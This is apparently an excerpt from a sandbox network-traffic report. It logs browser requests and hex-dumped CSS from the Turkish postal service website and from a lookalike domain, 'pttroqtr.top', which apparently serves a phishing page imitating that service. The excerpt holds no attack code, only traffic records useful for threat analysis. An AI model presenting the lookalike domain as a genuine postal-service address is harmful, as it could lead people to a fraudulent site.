                                                                                                                                                                                            Data Ascii: nput[type="number"], input[type="password"], input[type="search"], input[type="tel"], input[type="text"], input[type="time"], input[type="url"], input[type="week"],
                                                                                                                                                                                            2024-09-28 03:39:44 UTC1390INData Raw: 69 74 2d 6d 65 73 73 61 67 65 3a 3a 2d 77 65 62 6b 69 74 2d 73 63 72 6f 6c 6c 62 61 72 2d 74 72 61 63 6b 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 33 66 33 66 33 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 23 77 61 69 74 2d 6d 65 73 73 61 67 65 3a 3a 2d 77 65 62 6b 69 74 2d 73 63 72 6f 6c 6c 62 61 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 36 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 23 77 61 69 74 2d 6d 65 73 73 61 67 65 3a 3a 2d 77 65 62 6b 69 74 2d 73 63 72 6f 6c 6c 62 61 72 2d 74 68 75 6d 62 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c
                                                                                                                                                                                            Data Ascii: it-message::-webkit-scrollbar-track { background-color: #f3f3f3; ; } #wait-message::-webkit-scrollbar { width: 6px; } #wait-message::-webkit-scrollbar-thumb { background-col
                                                                                                                                                                                            2024-09-28 03:39:44 UTC1316INData Raw: 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 23 66 72 6d 53 74 61 72 74 43 68 61 74 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 31 30 70 78 3b 2a 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 70 78 20 31 35 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 6f 76 65 72 66 6c 6f 77 3a 20 61 75 74 6f 3b 2a 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 22 31 34 70 78 22 3b 0a 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 2f 2a 0a 20 20 20 20 20 20 20 20 23 62 74 6e 53 74 61 72 74 43 68 61 74 2c 20 23 62 74 6e 46 72 6d 4c 52 20 7b 0a 20 20 20 20 20
                                                                                                                                                                                            Data Ascii: } #frmStartChat { /*padding-top: 10px;*/ padding: 10px 15px; display: none; /*overflow: auto;*/ font-size: "14px"; } /* #btnStartChat, #btnFrmLR {
                                                                                                                                                                                            2024-09-28 03:39:44 UTC1390INData Raw: 6f 74 74 6f 6d 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 2f 2a 20 43 41 52 4f 55 53 45 4c 20 4d 45 53 53 41 47 45 20 2a 2f 0a 0a 20 20 20 20 20 20 20 20 2e 63 75 73 74 6f 6d 2d 6e 61 76 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 6f 70 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 72 69 67 68 74 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 2e 6f 77 6c 2d 70 72 65 76 2c 20 2e 6f 77 6c 2d 6e 65 78 74 20 7b 0a 20 20 20
                                                                                                                                                                                            Data Ascii: ottom: none; border-top: none; } /* CAROUSEL MESSAGE */ .custom-nav{ top: 0; position: absolute; left: 0; right: 0; } .owl-prev, .owl-next {
                                                                                                                                                                                            2024-09-28 03:39:44 UTC1390INData Raw: 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 6d 61 74 72 69 78 28 31 2c 20 2d 30 2e 30 32 2c 20 30 2e 30 32 2c 20 31 2c 20 30 2c 20 30 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 70 78 20 30 70 78 20 36 70 78 20 23 30 30 30 30 30 30 32 45 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 0a 20 20 20 20 20 20 20 20 2e 6f 77 6c 2d 70 72 65 76 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 35 70 78 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 20 20 20 20 20 20 20 20 7d
                                                                                                                                                                                            Data Ascii: background: white; transform: matrix(1, -0.02, 0.02, 1, 0, 0); box-shadow: 0px 0px 6px #0000002E; } .owl-prev { left: 0; margin-left: -5px !important; }


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            145192.168.2.5498848.211.203.1654432584C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-09-28 03:39:44 UTC405OUTGET /socket.io/?EIO=4&transport=polling&t=P8sjdiu&sid=ZtwaiGyEO0D_jrEhAEf6 HTTP/1.1
                                                                                                                                                                                            Host: pttroqtr.top
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-09-28 03:39:44 UTC198INHTTP/1.1 400 Bad Request
                                                                                                                                                                                            Server: nginx/1.24.0
                                                                                                                                                                                            Date: Sat, 28 Sep 2024 03:39:44 GMT
                                                                                                                                                                                            Content-Type: application/json
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                            2024-09-28 03:39:44 UTC52INData Raw: 32 39 0d 0a 7b 22 63 6f 64 65 22 3a 31 2c 22 6d 65 73 73 61 67 65 22 3a 22 53 65 73 73 69 6f 6e 20 49 44 20 75 6e 6b 6e 6f 77 6e 22 7d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 29{"code":1,"message":"Session ID unknown"}0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            146192.168.2.549871185.220.152.264432584C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-09-28 03:39:44 UTC609OUTGET /_next/static/css/81d8b40497d071a4.css HTTP/1.1
                                                                                                                                                                                            Host: www.ptt.gov.tr
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                            Referer: https://www.ptt.gov.tr/Sayfalar/Posta/DigerPostaIslemleriUst.aspx
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            Cookie: undefined=1
                                                                                                                                                                                            2024-09-28 03:39:44 UTC386INHTTP/1.1 200 OK
                                                                                                                                                                                            Cache-Control: public, max-age=31536000, immutable
                                                                                                                                                                                            Keep-Alive: timeout=5
                                                                                                                                                                                            Content-Type: text/css; charset=UTF-8
                                                                                                                                                                                            Last-Modified: Thu, 12 Sep 2024 09:54:30 GMT
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            ETag: W/"1039d-191e5a7dff0"
                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                            Date: Sat, 28 Sep 2024 03:39:44 GMT
                                                                                                                                                                                            Content-Length: 66461
                                                                                                                                                                                            Strict-Transport-Security: max-age=15552000; includeSubDomains; preload
                                                                                                                                                                                            2024-09-28 03:39:44 UTC6885INData Raw: 2e 73 74 79 6c 65 73 5f 73 68 69 70 6d 65 6e 74 54 72 61 63 6b 69 6e 67 50 72 65 76 69 65 77 4d 6f 64 61 6c 5f 5f 57 38 56 76 36 7b 70 6f 73 69 74 69 6f 6e 3a 66 69 78 65 64 3b 74 6f 70 3a 30 3b 72 69 67 68 74 3a 30 3b 6c 65 66 74 3a 30 3b 62 6f 74 74 6f 6d 3a 30 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 72 67 62 61 28 30 2c 30 2c 30 2c 2e 38 29 3b 2d 77 65 62 6b 69 74 2d 62 61 63 6b 64 72 6f 70 2d 66 69 6c 74 65 72 3a 62 6c 75 72 28 38 70 78 29 3b 2d 6d 6f 7a 2d 62 61 63 6b 64 72 6f 70 2d 66 69 6c 74 65 72 3a 62 6c 75 72 28 38 70 78 29 3b 2d 6f 2d 62 61 63 6b 64 72 6f 70 2d 66 69 6c 74 65 72 3a 62 6c 75 72 28 38 70 78 29 3b 62 61 63 6b 64 72 6f 70 2d 66 69 6c 74 65 72 3a 62 6c 75 72 28 38 70 78 29 3b 7a 2d 69 6e 64 65 78 3a 35 35 3b 6f 76 65
                                                                                                                                                                                            Data Ascii: .styles_shipmentTrackingPreviewModal__W8Vv6{position:fixed;top:0;right:0;left:0;bottom:0;background-color:rgba(0,0,0,.8);-webkit-backdrop-filter:blur(8px);-moz-backdrop-filter:blur(8px);-o-backdrop-filter:blur(8px);backdrop-filter:blur(8px);z-index:55;ove
                                                                                                                                                                                            2024-09-28 03:39:44 UTC7271INData Raw: 65 59 28 2d 35 30 25 29 3b 63 6f 6e 74 65 6e 74 3a 22 22 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 3b 77 69 64 74 68 3a 2e 35 72 65 6d 3b 68 65 69 67 68 74 3a 32 72 65 6d 7d 2e 73 74 79 6c 65 73 5f 73 68 69 70 6d 65 6e 74 54 72 61 63 6b 69 6e 67 5f 5f 54 53 6e 5f 7a 3e 2e 73 74 79 6c 65 73 5f 73 74 61 74 65 73 5f 5f 6e 51 36 7a 65 3e 2e 73 74 79 6c 65 73 5f 73 74 61 74 65 5f 5f 71 7a 6f 30 6a 3e 2e 73 74 79 6c 65 73 5f 70 72 6f 67 72 65 73 73 5f 5f 52 6b 56 53 5f 3e 2e 73 74 79 6c 65 73 5f 64 65 6c 69 76 65 72 79 49 6e 66 6f 72 6d 61 74 69 6f 6e 41 63 74 69 76 65 5f 5f 4f 36 52 64 33 7b 6c 65 66 74 3a 2d 37 30 25 7d 2e 73 74 79 6c 65 73 5f 73 68 69 70 6d 65 6e 74 54 72 61 63 6b 69 6e 67 5f 5f 54 53 6e 5f 7a 3e 2e 73 74 79 6c 65 73
                                                                                                                                                                                            Data Ascii: eY(-50%);content:"";background-color:#555;width:.5rem;height:2rem}.styles_shipmentTracking__TSn_z>.styles_states__nQ6ze>.styles_state__qzo0j>.styles_progress__RkVS_>.styles_deliveryInformationActive__O6Rd3{left:-70%}.styles_shipmentTracking__TSn_z>.styles
                                                                                                                                                                                            2024-09-28 03:39:44 UTC7271INData Raw: 3a 32 72 65 6d 7d 2e 73 74 79 6c 65 73 5f 73 68 69 70 6d 65 6e 74 54 72 61 63 6b 69 6e 67 5f 5f 54 53 6e 5f 7a 3e 2e 73 74 79 6c 65 73 5f 73 74 61 74 65 73 5f 5f 6e 51 36 7a 65 3e 2e 73 74 79 6c 65 73 5f 68 69 73 74 6f 72 79 5f 5f 35 75 34 65 55 3e 75 6c 3a 3a 2d 77 65 62 6b 69 74 2d 73 63 72 6f 6c 6c 62 61 72 2d 74 68 75 6d 62 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 62 37 62 37 62 37 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 32 72 65 6d 7d 2e 73 74 79 6c 65 73 5f 73 68 69 70 6d 65 6e 74 54 72 61 63 6b 69 6e 67 5f 5f 54 53 6e 5f 7a 3e 2e 73 74 79 6c 65 73 5f 73 74 61 74 65 73 5f 5f 6e 51 36 7a 65 3e 2e 73 74 79 6c 65 73 5f 68 69 73 74 6f 72 79 5f 5f 35 75 34 65 55 3e 75 6c 3e 6c 69 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65
                                                                                                                                                                                            Data Ascii: :2rem}.styles_shipmentTracking__TSn_z>.styles_states__nQ6ze>.styles_history__5u4eU>ul::-webkit-scrollbar-thumb{background-color:#b7b7b7;border-radius:2rem}.styles_shipmentTracking__TSn_z>.styles_states__nQ6ze>.styles_history__5u4eU>ul>li{position:relative
                                                                                                                                                                                            2024-09-28 03:39:44 UTC7271INData Raw: 3b 70 61 64 64 69 6e 67 3a 30 7d 2e 73 74 79 6c 65 73 5f 73 68 69 70 6d 65 6e 74 54 72 61 63 6b 69 6e 67 5f 5f 54 53 6e 5f 7a 3e 2e 73 74 79 6c 65 73 5f 73 74 61 74 65 73 5f 5f 6e 51 36 7a 65 3e 2e 73 74 79 6c 65 73 5f 73 74 61 74 65 5f 5f 71 7a 6f 30 6a 3e 2e 73 74 79 6c 65 73 5f 70 72 6f 67 72 65 73 73 5f 5f 52 6b 56 53 5f 3e 2e 73 74 79 6c 65 73 5f 70 61 6e 65 6c 5f 5f 54 76 30 67 67 3e 64 69 76 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 70 61 64 64 69 6e 67 3a 31 72 65 6d 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 32 70 78 20 64 61 73 68 65 64 20 23 63 63 63 7d 2e 73 74 79 6c 65 73 5f 73 68 69 70 6d 65 6e 74 54 72 61 63 6b 69 6e 67 5f 5f 54 53 6e 5f 7a 3e 2e 73 74 79 6c 65 73 5f 73 74 61 74 65 73 5f 5f 6e 51 36 7a 65 3e 2e 73 74 79 6c
                                                                                                                                                                                            Data Ascii: ;padding:0}.styles_shipmentTracking__TSn_z>.styles_states__nQ6ze>.styles_state__qzo0j>.styles_progress__RkVS_>.styles_panel__Tv0gg>div{position:relative;padding:1rem;border-bottom:2px dashed #ccc}.styles_shipmentTracking__TSn_z>.styles_states__nQ6ze>.styl
                                                                                                                                                                                            2024-09-28 03:39:44 UTC7271INData Raw: 6f 72 79 5f 5f 35 75 34 65 55 3e 75 6c 3e 6c 69 3e 70 7b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 2e 73 74 79 6c 65 73 5f 73 68 69 70 6d 65 6e 74 54 72 61 63 6b 69 6e 67 5f 5f 54 53 6e 5f 7a 3e 2e 73 74 79 6c 65 73 5f 73 74 61 74 65 73 5f 5f 6e 51 36 7a 65 3e 2e 73 74 79 6c 65 73 5f 68 69 73 74 6f 72 79 5f 5f 35 75 34 65 55 3e 75 6c 3e 6c 69 3a 6e 74 68 2d 63 68 69 6c 64 28 32 6e 29 2c 2e 73 74 79 6c 65 73 5f 73 68 69 70 6d 65 6e 74 54 72 61 63 6b 69 6e 67 5f 5f 54 53 6e 5f 7a 3e 2e 73 74 79 6c 65 73 5f 73 74 61 74 65 73 5f 5f 6e 51 36 7a 65 3e 2e 73 74 79 6c 65 73 5f 68 69 73 74 6f 72 79 5f 5f 35 75 34 65 55 3e 75 6c 3e 6c 69 3a 6e 74 68 2d 63 68 69 6c 64 28 6f 64 64 29 7b 70 61 64 64 69 6e 67 3a 30 20 2e 35 72 65 6d 7d 2e 73 74 79 6c 65 73 5f 73
                                                                                                                                                                                            Data Ascii: ory__5u4eU>ul>li>p{overflow:hidden}.styles_shipmentTracking__TSn_z>.styles_states__nQ6ze>.styles_history__5u4eU>ul>li:nth-child(2n),.styles_shipmentTracking__TSn_z>.styles_states__nQ6ze>.styles_history__5u4eU>ul>li:nth-child(odd){padding:0 .5rem}.styles_s
                                                                                                                                                                                            2024-09-28 03:39:44 UTC7271INData Raw: 61 62 65 6c 3e 73 70 61 6e 3a 66 69 72 73 74 2d 63 68 69 6c 64 7b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 72 65 6d 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 73 74 79 6c 65 73 5f 73 68 69 70 6d 65 6e 74 54 72 61 63 6b 69 6e 67 5f 5f 54 53 6e 5f 7a 3e 2e 73 74 79 6c 65 73 5f 73 74 61 74 65 73 5f 5f 6e 51 36 7a 65 3e 2e 73 74 79 6c 65 73 5f 73 74 61 74 65 5f 5f 71 7a 6f 30 6a 3e 2e 73 74 79 6c 65 73 5f 70 72 6f 67 72 65 73 73 5f 5f 52 6b 56 53 5f 3e 2e 73 74 79 6c 65 73 5f 64 65 6c 69 76 65 72 79 49 6e 66 6f 72 6d 61 74 69 6f 6e 5f 5f 67 61 30 50 44 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 73 74 79 6c 65 73 5f 73 68 69 70 6d 65 6e 74 54 72 61 63 6b 69 6e 67 5f 5f 54 53 6e 5f 7a 3e 2e 73 74 79 6c 65 73 5f 73 74 61 74 65 73 5f 5f 6e 51 36 7a 65 3e 2e 73 74 79 6c 65
                                                                                                                                                                                            Data Ascii: abel>span:first-child{font-size:.7rem!important}.styles_shipmentTracking__TSn_z>.styles_states__nQ6ze>.styles_state__qzo0j>.styles_progress__RkVS_>.styles_deliveryInformation__ga0PD{display:none}.styles_shipmentTracking__TSn_z>.styles_states__nQ6ze>.style
                                                                                                                                                                                            2024-09-28 03:39:44 UTC7271INData Raw: 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 3b 66 6c 65 78 2d 62 61 73 69 73 3a 31 30 30 25 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 70 61 64 64 69 6e 67 3a 2e 35 72 65 6d 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 2e 35 72 65 6d 3b 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 70 74 74 4c 69 6e 6b 43 6f 6c 6f 72 29 3b 2d 6f 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 31 35 70 78 20 34 30 70 78 20 2d 32 35 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 34 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 31 35 70 78 20 34 30 70 78 20 2d 32 35 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 34 29 7d 2e 73 74 79 6c 65 73 5f 73 68 69 70 6d 65 6e 74 54 72 61 63 6b 69
                                                                                                                                                                                            Data Ascii: x;display:-ms-flexbox;flex-direction:column;flex-basis:100%;background-color:#fff;padding:.5rem;border-radius:.5rem;color:var(--pttLinkColor);-o-box-shadow:0 15px 40px -25px rgba(0,0,0,.4);box-shadow:0 15px 40px -25px rgba(0,0,0,.4)}.styles_shipmentTracki
                                                                                                                                                                                            2024-09-28 03:39:44 UTC7271INData Raw: 75 3e 73 70 61 6e 3e 69 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 74 6f 70 3a 2d 2e 32 72 65 6d 3b 6c 65 66 74 3a 2e 30 35 72 65 6d 3b 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 70 74 74 4c 69 6e 6b 43 6f 6c 6f 72 29 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 72 65 6d 7d 2e 73 74 79 6c 65 73 5f 72 61 64 69 6f 42 75 74 74 6f 6e 5f 5f 47 4f 79 33 75 3e 69 6e 70 75 74 3a 63 68 65 63 6b 65 64 2b 73 70 61 6e 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 70 74 74 59 65 6c 6c 6f 77 43 6f 6c 6f 72 29 3b 77 69 64 74 68 3a 31 2e 31 72 65 6d 3b 68 65 69 67 68 74 3a 31 2e 31 72 65 6d 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 35 30 25 3b 61 6e 69 6d 61 74 69 6f 6e 3a 73 74 79 6c 65 73 5f 73 65 6c 65 63 74 65 64 5f 5f 73 58 44 76 73 20
                                                                                                                                                                                            Data Ascii: u>span>i{position:relative;top:-.2rem;left:.05rem;color:var(--pttLinkColor);font-size:.7rem}.styles_radioButton__GOy3u>input:checked+span{background-color:var(--pttYellowColor);width:1.1rem;height:1.1rem;border-radius:50%;animation:styles_selected__sXDvs
                                                                                                                                                                                            2024-09-28 03:39:44 UTC7271INData Raw: 6f 6e 65 7d 2e 73 74 79 6c 65 73 5f 73 68 69 70 6d 65 6e 74 54 72 61 63 6b 69 6e 67 43 61 72 64 5f 5f 6e 6a 5f 65 44 3e 2e 73 74 79 6c 65 73 5f 62 6f 64 79 5f 5f 62 44 76 36 6d 3e 62 75 74 74 6f 6e 3e 69 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 2d 35 30 25 29 3b 61 6e 69 6d 61 74 69 6f 6e 3a 73 74 79 6c 65 73 5f 70 72 6f 67 72 65 73 73 41 6e 69 6d 61 74 69 6f 6e 5f 5f 43 68 4b 5a 38 20 31 73 20 65 61 73 65 2d 69 6e 2d 6f 75 74 20 69 6e 66 69 6e 69 74 65 7d 2e 73 74 79 6c 65 73 5f 73 68 69 70 6d 65 6e 74 54 72 61 63 6b 69 6e 67 43 61 72 64 5f 5f 6e 6a 5f 65 44 3e 2e 73 74 79 6c 65 73 5f 62 6f 64 79 5f 5f 62 44 76 36
                                                                                                                                                                                            Data Ascii: one}.styles_shipmentTrackingCard__nj_eD>.styles_body__bDv6m>button>i{position:absolute;top:50%;left:50%;transform:translate(-50%,-50%);animation:styles_progressAnimation__ChKZ8 1s ease-in-out infinite}.styles_shipmentTrackingCard__nj_eD>.styles_body__bDv6
                                                                                                                                                                                            2024-09-28 03:39:44 UTC1408INData Raw: 61 72 28 2d 2d 70 74 74 4c 69 6e 6b 43 6f 6c 6f 72 29 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 76 61 72 28 2d 2d 66 6f 6e 74 57 65 69 67 68 74 29 3b 6f 72 64 65 72 3a 30 7d 2e 73 74 79 6c 65 73 5f 73 6c 69 64 65 72 5f 5f 31 36 34 58 30 3e 2e 73 74 79 6c 65 73 5f 62 75 74 74 6f 6e 73 5f 5f 76 75 38 42 46 3e 6c 69 3a 66 69 72 73 74 2d 63 68 69 6c 64 3e 69 7b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 2e 35 72 65 6d 3b 61 6e 69 6d 61 74 69 6f 6e 3a 73 74 79 6c 65 73 5f 76 69 62 72 61 74 65 2d 31 5f 5f 34 4b 35 56 69 20 2e 33 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 20 62 6f 74 68 7d 2e 73 74 79 6c 65 73 5f 73 6c 69 64 65 72 5f 5f 31 36 34 58 30 3e 2e 73 74 79 6c 65 73 5f 62 75 74 74 6f 6e 73 5f 5f 76 75 38 42 46 3e 6c 69 3a 6e 74 68 2d 63 68 69 6c 64 28
                                                                                                                                                                                            Data Ascii: ar(--pttLinkColor);font-weight:var(--fontWeight);order:0}.styles_slider__164X0>.styles_buttons__vu8BF>li:first-child>i{margin-right:.5rem;animation:styles_vibrate-1__4K5Vi .3s linear infinite both}.styles_slider__164X0>.styles_buttons__vu8BF>li:nth-child(


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            147192.168.2.549870185.220.152.264432584C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-09-28 03:39:44 UTC609OUTGET /_next/static/css/6243e9b9a276eab5.css HTTP/1.1
                                                                                                                                                                                            Host: www.ptt.gov.tr
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                            Referer: https://www.ptt.gov.tr/Sayfalar/Posta/DigerPostaIslemleriUst.aspx
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            Cookie: undefined=1
                                                                                                                                                                                            2024-09-28 03:39:44 UTC385INHTTP/1.1 200 OK
                                                                                                                                                                                            Cache-Control: public, max-age=31536000, immutable
                                                                                                                                                                                            Keep-Alive: timeout=5
                                                                                                                                                                                            Content-Type: text/css; charset=UTF-8
                                                                                                                                                                                            Last-Modified: Thu, 12 Sep 2024 09:54:30 GMT
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            ETag: W/"4192-191e5a7dff0"
                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                            Date: Sat, 28 Sep 2024 03:39:43 GMT
                                                                                                                                                                                            Content-Length: 16786
                                                                                                                                                                                            Strict-Transport-Security: max-age=15552000; includeSubDomains; preload
                                                                                                                                                                                            2024-09-28 03:39:44 UTC6886INData Raw: 2e 73 74 79 6c 65 73 5f 63 6f 6e 74 61 69 6e 65 72 5f 5f 53 4d 32 75 4b 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 7d 2e 73 74 79 6c 65 73 5f 63 6f 6e 74 61 69 6e 65 72 5f 5f 53 4d 32 75 4b 3e 2e 73 74 79 6c 65 73 5f 74 69 74 6c 65 5f 5f 77 53 67 33 63 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 34 72 65 6d 3b 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 70 74 74 4c 69 6e 6b 43 6f 6c 6f 72 29 3b 66 6f 6e
                                                                                                                                                                                            Data Ascii: .styles_container__SM2uK{display:flex;display:-ms-flexbox;justify-content:center;align-items:center;flex-direction:column}.styles_container__SM2uK>.styles_title__wSg3c{position:relative;display:inline-block;margin-bottom:4rem;color:var(--pttLinkColor);fon
